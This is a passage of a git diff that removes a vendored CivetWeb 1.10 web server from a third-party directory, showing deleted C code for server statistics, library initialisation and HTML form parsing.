-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"clang: %u.%u.%u (%s)\",%s",
-		            __clang_major__,
-		            __clang_minor__,
-		            __clang_patchlevel__,
-		            __clang_version__,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__GNUC__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"gcc: %u.%u.%u\",%s",
-		            (unsigned)__GNUC__,
-		            (unsigned)__GNUC_MINOR__,
-		            (unsigned)__GNUC_PATCHLEVEL__,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__INTEL_COMPILER)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"Intel C/C++: %u\",%s",
-		            (unsigned)__INTEL_COMPILER,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__BORLANDC__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"Borland C: 0x%x\",%s",
-		            (unsigned)__BORLANDC__,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__SUNPRO_C)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"Solaris: 0x%x\",%s",
-		            (unsigned)__SUNPRO_C,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#else
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"other\",%s",
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-	}
-
-	/* Determine 32/64 bit data mode.
-	 * see https://en.wikipedia.org/wiki/64-bit_computing */
-	{
-		mg_snprintf(
-		    NULL,
-		    NULL,
-		    block,
-		    sizeof(block),
-		    "\"data_model\" : \"int:%u/%u/%u/%u, float:%u/%u/%u, char:%u/%u, "
-		    "ptr:%u, size:%u, time:%u\"%s",
-		    (unsigned)sizeof(short),
-		    (unsigned)sizeof(int),
-		    (unsigned)sizeof(long),
-		    (unsigned)sizeof(long long),
-		    (unsigned)sizeof(float),
-		    (unsigned)sizeof(double),
-		    (unsigned)sizeof(long double),
-		    (unsigned)sizeof(char),
-		    (unsigned)sizeof(wchar_t),
-		    (unsigned)sizeof(void *),
-		    (unsigned)sizeof(size_t),
-		    (unsigned)sizeof(time_t),
-		    eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Terminate string */
-	if ((buflen > 0) && buffer && buffer[0]) {
-		if (system_info_length < buflen) {
-			strcat0(buffer, eoobj);
-			strcat0(buffer, eol);
-		}
-	}
-	system_info_length += reserved_len;
-
-	return system_info_length;
-}
-
-
-#if defined(USE_SERVER_STATS)
-/* Get context information. It can be printed or stored by the caller.
- * Return the size of available information. */
-static int
-mg_get_context_info_impl(const struct mg_context *ctx, char *buffer, int buflen)
-
-{
-	char block[256];
-	int context_info_length = 0;
-
-#if defined(_WIN32)
-	const char *eol = "\r\n";
-#else
-	const char *eol = "\n";
-#endif
-	struct mg_memory_stat *ms = get_memory_stat((struct mg_context *)ctx);
-
-	const char *eoobj = "}";
-	int reserved_len = (int)strlen(eoobj) + (int)strlen(eol);
-
-	if ((buffer == NULL) || (buflen < 1)) {
-		buflen = 0;
-	} else {
-		*buffer = 0;
-	}
-
-	mg_snprintf(NULL, NULL, block, sizeof(block), "{%s", eol);
-	context_info_length += (int)strlen(block);
-	if (context_info_length < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Memory information */
-	if (ms) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"memory\" : {%s"
-		            "\"blocks\" : %i,%s"
-		            "\"used\" : %" INT64_FMT ",%s"
-		            "\"maxUsed\" : %" INT64_FMT "%s"
-		            "}%s%s",
-		            eol,
-		            ms->blockCount,
-		            eol,
-		            ms->totalMemUsed,
-		            eol,
-		            ms->maxMemUsed,
-		            eol,
-		            (ctx ? "," : ""),
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-
-	/* Connections information */
-	if (ctx) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"connections\" : {%s"
-		            "\"active\" : %i,%s"
-		            "\"maxActive\" : %i,%s"
-		            "\"total\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            ctx->active_connections,
-		            eol,
-		            ctx->max_connections,
-		            eol,
-		            ctx->total_connections,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Requests information */
-	if (ctx) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"requests\" : {%s"
-		            "\"total\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            ctx->total_requests,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Data information */
-	if (ctx) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"data\" : {%s"
-		            "\"read\" : %" INT64_FMT "%s,"
-		            "\"written\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            ctx->total_data_read,
-		            eol,
-		            ctx->total_data_written,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Execution time information */
-	if (ctx) {
-		char start_time_str[64] = {0};
-		char now_str[64] = {0};
-		time_t start_time = ctx->start_time;
-		time_t now = time(NULL);
-
-		gmt_time_string(start_time_str,
-		                sizeof(start_time_str) - 1,
-		                &start_time);
-		gmt_time_string(now_str, sizeof(now_str) - 1, &now);
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"time\" : {%s"
-		            "\"uptime\" : %.0f,%s"
-		            "\"start\" : \"%s\",%s"
-		            "\"now\" : \"%s\"%s"
-		            "}%s",
-		            eol,
-		            difftime(now, start_time),
-		            eol,
-		            start_time_str,
-		            eol,
-		            now_str,
-		            eol,
-		            eol);
-
-		context_info_length += (int)strlen(block);
-		if (context_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Terminate string */
-	if ((buflen > 0) && buffer && buffer[0]) {
-		if (context_info_length < buflen) {
-			strcat0(buffer, eoobj);
-			strcat0(buffer, eol);
-		}
-	}
-	context_info_length += reserved_len;
-
-	return context_info_length;
-}
-#endif
-
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-/* Get connection information. It can be printed or stored by the caller.
- * Return the size of available information. */
-static int
-mg_get_connection_info_impl(const struct mg_context *ctx,
-                            int idx,
-                            char *buffer,
-                            int buflen)
-{
-	const struct mg_connection *conn;
-	const struct mg_request_info *ri;
-	char block[256];
-	int connection_info_length = 0;
-	int state = 0;
-	const char *state_str = "unknown";
-
-#if defined(_WIN32)
-	const char *eol = "\r\n";
-#else
-	const char *eol = "\n";
-#endif
-
-	const char *eoobj = "}";
-	int reserved_len = (int)strlen(eoobj) + (int)strlen(eol);
-
-	if ((buffer == NULL) || (buflen < 1)) {
-		buflen = 0;
-	} else {
-		*buffer = 0;
-	}
-
-	if ((ctx == NULL) || (idx < 0)) {
-		/* Parameter error */
-		return 0;
-	}
-
-	if ((unsigned)idx >= ctx->cfg_worker_threads) {
-		/* Out of range */
-		return 0;
-	}
-
-	/* Take connection [idx]. This connection is not locked in
-	 * any way, so some other thread might use it. */
-	conn = (ctx->worker_connections) + idx;
-
-	/* Initialize output string */
-	mg_snprintf(NULL, NULL, block, sizeof(block), "{%s", eol);
-	connection_info_length += (int)strlen(block);
-	if (connection_info_length < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Init variables */
-	ri = &(conn->request_info);
-
-#if defined(USE_SERVER_STATS)
-	state = conn->conn_state;
-
-	/* State as string */
-	switch (state) {
-	case 0:
-		state_str = "undefined";
-		break;
-	case 1:
-		state_str = "not used";
-		break;
-	case 2:
-		state_str = "init";
-		break;
-	case 3:
-		state_str = "ready";
-		break;
-	case 4:
-		state_str = "processing";
-		break;
-	case 5:
-		state_str = "processed";
-		break;
-	case 6:
-		state_str = "to close";
-		break;
-	case 7:
-		state_str = "closing";
-		break;
-	case 8:
-		state_str = "closed";
-		break;
-	case 9:
-		state_str = "done";
-		break;
-	}
-#endif
-
-	/* Connection info */
-	if ((state >= 3) && (state < 9)) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"connection\" : {%s"
-		            "\"remote\" : {%s"
-		            "\"protocol\" : \"%s\",%s"
-		            "\"addr\" : \"%s\",%s"
-		            "\"port\" : %u%s"
-		            "},%s"
-		            "\"handled_requests\" : %u%s"
-		            "},%s",
-		            eol,
-		            eol,
-		            get_proto_name(conn),
-		            eol,
-		            ri->remote_addr,
-		            eol,
-		            ri->remote_port,
-		            eol,
-		            eol,
-		            conn->handled_requests,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Request info */
-	if ((state >= 4) && (state < 6)) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"request_info\" : {%s"
-		            "\"method\" : \"%s\",%s"
-		            "\"uri\" : \"%s\",%s"
-		            "\"query\" : %s%s%s%s"
-		            "},%s",
-		            eol,
-		            ri->request_method,
-		            eol,
-		            ri->request_uri,
-		            eol,
-		            ri->query_string ? "\"" : "",
-		            ri->query_string ? ri->query_string : "null",
-		            ri->query_string ? "\"" : "",
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Execution time information */
-	if ((state >= 2) && (state < 9)) {
-		char start_time_str[64] = {0};
-		char now_str[64] = {0};
-		time_t start_time = conn->conn_birth_time;
-		time_t now = time(NULL);
-
-		gmt_time_string(start_time_str,
-		                sizeof(start_time_str) - 1,
-		                &start_time);
-		gmt_time_string(now_str, sizeof(now_str) - 1, &now);
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"time\" : {%s"
-		            "\"uptime\" : %.0f,%s"
-		            "\"start\" : \"%s\",%s"
-		            "\"now\" : \"%s\"%s"
-		            "},%s",
-		            eol,
-		            difftime(now, start_time),
-		            eol,
-		            start_time_str,
-		            eol,
-		            now_str,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Remote user name */
-	if ((ri->remote_user) && (state < 9)) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"user\" : {%s"
-		            "\"name\" : \"%s\",%s"
-		            "},%s",
-		            eol,
-		            ri->remote_user,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* Data block */
-	if (state >= 3) {
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"data\" : {%s"
-		            "\"read\" : %" INT64_FMT ",%s"
-		            "\"written\" : %" INT64_FMT "%s"
-		            "},%s",
-		            eol,
-		            conn->consumed_content,
-		            eol,
-		            conn->num_bytes_sent,
-		            eol,
-		            eol);
-
-		connection_info_length += (int)strlen(block);
-		if (connection_info_length + reserved_len < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* State */
-	mg_snprintf(NULL,
-	            NULL,
-	            block,
-	            sizeof(block),
-	            "\"state\" : \"%s\"%s",
-	            state_str,
-	            eol);
-
-	connection_info_length += (int)strlen(block);
-	if (connection_info_length + reserved_len < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Terminate string */
-	if ((buflen > 0) && buffer && buffer[0]) {
-		if (connection_info_length < buflen) {
-			strcat0(buffer, eoobj);
-			strcat0(buffer, eol);
-		}
-	}
-	connection_info_length += reserved_len;
-
-	return connection_info_length;
-}
-#endif
-
-
-/* Get system information. It can be printed or stored by the caller.
- * Return the size of available information. */
-int
-mg_get_system_info(char *buffer, int buflen)
-{
-	if ((buffer == NULL) || (buflen < 1)) {
-		return mg_get_system_info_impl(NULL, 0);
-	} else {
-		/* Reset buffer, so we can always use strcat. */
-		buffer[0] = 0;
-		return mg_get_system_info_impl(buffer, buflen);
-	}
-}
-
-
-/* Get context information. It can be printed or stored by the caller.
- * Return the size of available information. */
-int
-mg_get_context_info(const struct mg_context *ctx, char *buffer, int buflen)
-{
-#if defined(USE_SERVER_STATS)
-	if ((buffer == NULL) || (buflen < 1)) {
-		return mg_get_context_info_impl(ctx, NULL, 0);
-	} else {
-		/* Reset buffer, so we can always use strcat. */
-		buffer[0] = 0;
-		return mg_get_context_info_impl(ctx, buffer, buflen);
-	}
-#else
-	(void)ctx;
-	if ((buffer != NULL) && (buflen > 0)) {
-		buffer[0] = 0;
-	}
-	return 0;
-#endif
-}
-
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-int
-mg_get_connection_info(const struct mg_context *ctx,
-                       int idx,
-                       char *buffer,
-                       int buflen)
-{
-	if ((buffer == NULL) || (buflen < 1)) {
-		return mg_get_connection_info_impl(ctx, idx, NULL, 0);
-	} else {
-		/* Reset buffer, so we can always use strcat. */
-		buffer[0] = 0;
-		return mg_get_connection_info_impl(ctx, idx, buffer, buflen);
-	}
-}
-#endif
-
-
-/* Initialize this library. This function does not need to be thread safe.
- */
-unsigned
-mg_init_library(unsigned features)
-{
-#if !defined(NO_SSL)
-	char ebuf[128];
-#endif
-
-	unsigned features_to_init = mg_check_feature(features & 0xFFu);
-	unsigned features_inited = features_to_init;
-
-	if (mg_init_library_called <= 0) {
-		/* Not initialized yet */
-		if (0 != pthread_mutex_init(&global_lock_mutex, NULL)) {
-			return 0;
-		}
-	}
-
-	mg_global_lock();
-
-	if (mg_init_library_called <= 0) {
-		if (0 != pthread_key_create(&sTlsKey, tls_dtor)) {
-			/* Fatal error - abort start. However, this situation should
-			 * never occur in practice. */
-			return 0;
-		}
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		InitializeCriticalSection(&global_log_file_lock);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-#if !defined(_WIN32)
-		pthread_mutexattr_init(&pthread_mutex_attr);
-		pthread_mutexattr_settype(&pthread_mutex_attr, PTHREAD_MUTEX_RECURSIVE);
-#endif
-
-#if defined(USE_LUA)
-		lua_init_optional_libraries();
-#endif
-	}
-
-
-#if !defined(NO_SSL)
-	if (features_to_init & 2) {
-		if (!mg_ssl_initialized) {
-			if (initialize_ssl(ebuf, sizeof(ebuf))) {
-				mg_ssl_initialized = 1;
-			} else {
-				(void)ebuf;
-				/* TODO: print error */
-				features_inited &= ~(2u);
-			}
-		} else {
-			/* ssl already initialized */
-		}
-	}
-#endif
-
-	/* Start WinSock for Windows */
-	if (mg_init_library_called <= 0) {
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		WSADATA data;
-		WSAStartup(MAKEWORD(2, 2), &data);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-		mg_init_library_called = 1;
-	} else {
-		mg_init_library_called++;
-	}
-
-	mg_global_unlock();
-
-	return features_inited;
-}
-
-
-/* Un-initialize this library. */
-unsigned
-mg_exit_library(void)
-{
-	if (mg_init_library_called <= 0) {
-		return 0;
-	}
-
-	mg_global_lock();
-
-	mg_init_library_called--;
-	if (mg_init_library_called == 0) {
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		(void)WSACleanup();
-#endif /* _WIN32 && !__SYMBIAN32__ */
-#if !defined(NO_SSL)
-		if (mg_ssl_initialized) {
-			uninitialize_ssl();
-			mg_ssl_initialized = 0;
-		}
-#endif
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-		(void)DeleteCriticalSection(&global_log_file_lock);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-#if !defined(_WIN32)
-		(void)pthread_mutexattr_destroy(&pthread_mutex_attr);
-#endif
-
-		(void)pthread_key_delete(sTlsKey);
-
-#if defined(USE_LUA)
-		lua_exit_optional_libraries();
-#endif
-
-		mg_global_unlock();
-		(void)pthread_mutex_destroy(&global_lock_mutex);
-		return 1;
-	}
-
-	mg_global_unlock();
-	return 1;
-}
-
-
-/* End of civetweb.c */
diff --git a/thirdparty/civetweb-1.10/src/civetweb_private_lua.h b/thirdparty/civetweb-1.10/src/civetweb_private_lua.h
deleted file mode 100644
index 47c6566..0000000
--- a/thirdparty/civetweb-1.10/src/civetweb_private_lua.h
+++ /dev/null
@@ -1,11 +0,0 @@
-/* "civetweb_private_lua.h" */
-/* Project internal header to allow main.c to call a non-public function in
- * mod_lua.inl */
-
-#ifndef CIVETWEB_PRIVATE_LUA_H
-#define CIVETWEB_PRIVATE_LUA_H
-
-int run_lua(const char *file_name);
-
-
-#endif
diff --git a/thirdparty/civetweb-1.10/src/file_ops.inl b/thirdparty/civetweb-1.10/src/file_ops.inl
deleted file mode 100644
index cfaadea..0000000
--- a/thirdparty/civetweb-1.10/src/file_ops.inl
+++ /dev/null
@@ -1 +0,0 @@
-/* currently not required */

diff --git a/thirdparty/civetweb-1.10/src/handle_form.inl b/thirdparty/civetweb-1.10/src/handle_form.inl
deleted file mode 100644
index 2a213ad..0000000
--- a/thirdparty/civetweb-1.10/src/handle_form.inl
+++ /dev/null
@@ -1,949 +0,0 @@
-/* Copyright (c) 2016-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-
-static int
-url_encoded_field_found(const struct mg_connection *conn,
-                        const char *key,
-                        size_t key_len,
-                        const char *filename,
-                        size_t filename_len,
-                        char *path,
-                        size_t path_len,
-                        struct mg_form_data_handler *fdh)
-{
-	char key_dec[1024];
-	char filename_dec[1024];
-	int key_dec_len;
-	int filename_dec_len;
-	int ret;
-
-	key_dec_len =
-	    mg_url_decode(key, (int)key_len, key_dec, (int)sizeof(key_dec), 1);
-
-	if (((size_t)key_dec_len >= (size_t)sizeof(key_dec)) || (key_dec_len < 0)) {
-		return FORM_FIELD_STORAGE_SKIP;
-	}
-
-	if (filename) {
-		filename_dec_len = mg_url_decode(filename,
-		                                 (int)filename_len,
-		                                 filename_dec,
-		                                 (int)sizeof(filename_dec),
-		                                 1);
-
-		if (((size_t)filename_dec_len >= (size_t)sizeof(filename_dec))
-		    || (filename_dec_len < 0)) {
-			/* Log error message and skip this field. */
-			mg_cry(conn, "%s: Cannot decode filename", __func__);
-			return FORM_FIELD_STORAGE_SKIP;
-		}
-	} else {
-		filename_dec[0] = 0;
-	}
-
-	ret =
-	    fdh->field_found(key_dec, filename_dec, path, path_len, fdh->user_data);
-
-	if ((ret & 0xF) == FORM_FIELD_STORAGE_GET) {
-		if (fdh->field_get == NULL) {
-			mg_cry(conn, "%s: Function \"Get\" not available", __func__);
-			return FORM_FIELD_STORAGE_SKIP;
-		}
-	}
-	if ((ret & 0xF) == FORM_FIELD_STORAGE_STORE) {
-		if (fdh->field_store == NULL) {
-			mg_cry(conn, "%s: Function \"Store\" not available", __func__);
-			return FORM_FIELD_STORAGE_SKIP;
-		}
-	}
-
-	return ret;
-}
-
-
-static int
-url_encoded_field_get(const struct mg_connection *conn,
-                      const char *key,
-                      size_t key_len,
-                      const char *value,
-                      size_t value_len,
-                      struct mg_form_data_handler *fdh)
-{
-	char key_dec[1024];
-
-	char *value_dec = (char *)mg_malloc_ctx(value_len + 1, conn->ctx);
-	int value_dec_len, ret;
-
-	if (!value_dec) {
-		/* Log error message and stop parsing the form data. */
-		mg_cry(conn,
-		       "%s: Not enough memory (required: %lu)",
-		       __func__,
-		       (unsigned long)(value_len + 1));
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-
-	mg_url_decode(key, (int)key_len, key_dec, (int)sizeof(key_dec), 1);
-
-	value_dec_len =
-	    mg_url_decode(value, (int)value_len, value_dec, (int)value_len + 1, 1);
-
-	ret = fdh->field_get(key_dec,
-	                     value_dec,
-	                     (size_t)value_dec_len,
-	                     fdh->user_data);
-
-	mg_free(value_dec);
-
-	return ret;
-}
-
-
-static int
-unencoded_field_get(const struct mg_connection *conn,
-                    const char *key,
-                    size_t key_len,
-                    const char *value,
-                    size_t value_len,
-                    struct mg_form_data_handler *fdh)
-{
-	char key_dec[1024];
-	(void)conn;
-
-	mg_url_decode(key, (int)key_len, key_dec, (int)sizeof(key_dec), 1);
-
-	return fdh->field_get(key_dec, value, value_len, fdh->user_data);
-}
-
-
-static int
-field_stored(const struct mg_connection *conn,
-             const char *path,
-             long long file_size,
-             struct mg_form_data_handler *fdh)
-{
-	/* Equivalent to "upload" callback of "mg_upload". */
-
-	(void)conn; /* we do not need mg_cry here, so conn is currently unused */
-
-	return fdh->field_store(path, file_size, fdh->user_data);
-}
-
-
-static const char *
-search_boundary(const char *buf,
-                size_t buf_len,
-                const char *boundary,
-                size_t boundary_len)
-{
-	/* We must do a binary search here, not a string search, since the buffer
-	 * may contain '\x00' bytes, if binary data is transferred. */
-	int clen = (int)buf_len - (int)boundary_len - 4;
-	int i;
-
-	for (i = 0; i <= clen; i++) {
-		if (!memcmp(buf + i, "\r\n--", 4)) {
-			if (!memcmp(buf + i + 4, boundary, boundary_len)) {
-				return buf + i;
-			}
-		}
-	}
-	return NULL;
-}
-
-
-int
-mg_handle_form_request(struct mg_connection *conn,
-                       struct mg_form_data_handler *fdh)
-{
-	const char *content_type;
-	char path[512];
-	char buf[1024]; /* Must not be smaller than ~900 - see sanity check */
-	int field_storage;
-	int buf_fill = 0;
-	int r;
-	int field_count = 0;
-	struct mg_file fstore = STRUCT_FILE_INITIALIZER;
-	int64_t file_size = 0; /* init here, to a avoid a false positive
-	                         "uninitialized variable used" warning */
-
-	int has_body_data =
-	    (conn->request_info.content_length > 0) || (conn->is_chunked);
-
-	/* There are three ways to encode data from a HTML form:
-	 * 1) method: GET (default)
-	 *    The form data is in the HTTP query string.
-	 * 2) method: POST, enctype: "application/x-www-form-urlencoded"
-	 *    The form data is in the request body.
-	 *    The body is url encoded (the default encoding for POST).
-	 * 3) method: POST, enctype: "multipart/form-data".
-	 *    The form data is in the request body of a multipart message.
-	 *    This is the typical way to handle file upload from a form.
-	 */
-
-	if (!has_body_data) {
-		const char *data;
-
-		if (strcmp(conn->request_info.request_method, "GET")) {
-			/* No body data, but not a GET request.
-			 * This is not a valid form request. */
-			return -1;
-		}
-
-		/* GET request: form data is in the query string. */
-		/* The entire data has already been loaded, so there is no nead to
-		 * call mg_read. We just need to split the query string into key-value
-		 * pairs. */
-		data = conn->request_info.query_string;
-		if (!data) {
-			/* No query string. */
-			return -1;
-		}
-
-		/* Split data in a=1&b=xy&c=3&c=4 ... */
-		while (*data) {
-			const char *val = strchr(data, '=');
-			const char *next;
-			ptrdiff_t keylen, vallen;
-
-			if (!val) {
-				break;
-			}
-			keylen = val - data;
-
-			/* In every "field_found" callback we ask what to do with the
-			 * data ("field_storage"). This could be:
-			 * FORM_FIELD_STORAGE_SKIP (0) ... ignore the value of this field
-			 * FORM_FIELD_STORAGE_GET (1) ... read the data and call the get
-			 *                              callback function
-			 * FORM_FIELD_STORAGE_STORE (2) ... store the data in a file
-			 * FORM_FIELD_STORAGE_READ (3) ... let the user read the data
-			 *                               (for parsing long data on the fly)
-			 *                               (currently not implemented)
-			 * FORM_FIELD_STORAGE_ABORT (flag) ... stop parsing
-			 */
-			memset(path, 0, sizeof(path));
-			field_count++;
-			field_storage = url_encoded_field_found(conn,
-			                                        data,
-			                                        (size_t)keylen,
-			                                        NULL,
-			                                        0,
-			                                        path,
-			                                        sizeof(path) - 1,
-			                                        fdh);
-
-			val++;
-			next = strchr(val, '&');
-			if (next) {
-				vallen = next - val;
-				next++;
-			} else {
-				vallen = (ptrdiff_t)strlen(val);
-				next = val + vallen;
-			}
-
-			if (field_storage == FORM_FIELD_STORAGE_GET) {
-				/* Call callback */
-				url_encoded_field_get(
-				    conn, data, (size_t)keylen, val, (size_t)vallen, fdh);
-			}
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-				/* Store the content to a file */
-				if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fstore) == 0) {
-					fstore.access.fp = NULL;
-				}
-				file_size = 0;
-				if (fstore.access.fp != NULL) {
-					size_t n = (size_t)
-					    fwrite(val, 1, (size_t)vallen, fstore.access.fp);
-					if ((n != (size_t)vallen) || (ferror(fstore.access.fp))) {
-						mg_cry(conn,
-						       "%s: Cannot write file %s",
-						       __func__,
-						       path);
-						(void)mg_fclose(&fstore.access);
-						remove_bad_file(conn, path);
-					}
-					file_size += (int64_t)n;
-
-					if (fstore.access.fp) {
-						r = mg_fclose(&fstore.access);
-						if (r == 0) {
-							/* stored successfully */
-							field_stored(conn, path, file_size, fdh);
-						} else {
-							mg_cry(conn,
-							       "%s: Error saving file %s",
-							       __func__,
-							       path);
-							remove_bad_file(conn, path);
-						}
-						fstore.access.fp = NULL;
-					}
-
-				} else {
-					mg_cry(conn, "%s: Cannot create file %s", __func__, path);
-				}
-			}
-
-			/* if (field_storage == FORM_FIELD_STORAGE_READ) { */
-			/* The idea of "field_storage=read" is to let the API user read
-			 * data chunk by chunk and to some data processing on the fly.
-			 * This should avoid the need to store data in the server:
-			 * It should neither be stored in memory, like
-			 * "field_storage=get" does, nor in a file like
-			 * "field_storage=store".
-			 * However, for a "GET" request this does not make any much
-			 * sense, since the data is already stored in memory, as it is
-			 * part of the query string.
-			 */
-			/* } */
-
-			if ((field_storage & FORM_FIELD_STORAGE_ABORT)
-			    == FORM_FIELD_STORAGE_ABORT) {
-				/* Stop parsing the request */
-				break;
-			}
-
-			/* Proceed to next entry */
-			data = next;
-		}
-
-		return field_count;
-	}
-
-	content_type = mg_get_header(conn, "Content-Type");
-
-	if (!content_type
-	    || !mg_strcasecmp(content_type, "APPLICATION/X-WWW-FORM-URLENCODED")
-	    || !mg_strcasecmp(content_type, "APPLICATION/WWW-FORM-URLENCODED")) {
-		/* The form data is in the request body data, encoded in key/value
-		 * pairs. */
-		int all_data_read = 0;
-
-		/* Read body data and split it in keys and values.
-		 * The encoding is like in the "GET" case above: a=1&b&c=3&c=4.
-		 * Here we use "POST", and read the data from the request body.
-		 * The data read on the fly, so it is not required to buffer the
-		 * entire request in memory before processing it. */
-		for (;;) {
-			const char *val;
-			const char *next;
-			ptrdiff_t keylen, vallen;
-			ptrdiff_t used;
-			int end_of_key_value_pair_found = 0;
-			int get_block;
-
-			if ((size_t)buf_fill < (sizeof(buf) - 1)) {
-
-				size_t to_read = sizeof(buf) - 1 - (size_t)buf_fill;
-				r = mg_read(conn, buf + (size_t)buf_fill, to_read);
-				if (r < 0) {
-					/* read error */
-					return -1;
-				}
-				if (r != (int)to_read) {
-					/* TODO: Create a function to get "all_data_read" from
-					 * the conn object. All data is read if the Content-Length
-					 * has been reached, or if chunked encoding is used and
-					 * the end marker has been read, or if the connection has
-					 * been closed. */
-					all_data_read = 1;
-				}
-				buf_fill += r;
-				buf[buf_fill] = 0;
-				if (buf_fill < 1) {
-					break;
-				}
-			}
-
-			val = strchr(buf, '=');
-
-			if (!val) {
-				break;
-			}
-			keylen = val - buf;
-			val++;
-
-			/* Call callback */
-			memset(path, 0, sizeof(path));
-			field_count++;
-			field_storage = url_encoded_field_found(conn,
-			                                        buf,
-			                                        (size_t)keylen,
-			                                        NULL,
-			                                        0,
-			                                        path,
-			                                        sizeof(path) - 1,
-			                                        fdh);
-
-			if ((field_storage & FORM_FIELD_STORAGE_ABORT)
-			    == FORM_FIELD_STORAGE_ABORT) {
-				/* Stop parsing the request */
-				break;
-			}
-
-			if (field_storage == FORM_FIELD_STORAGE_STORE) {
-				if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fstore) == 0) {
-					fstore.access.fp = NULL;
-				}
-				file_size = 0;
-				if (!fstore.access.fp) {
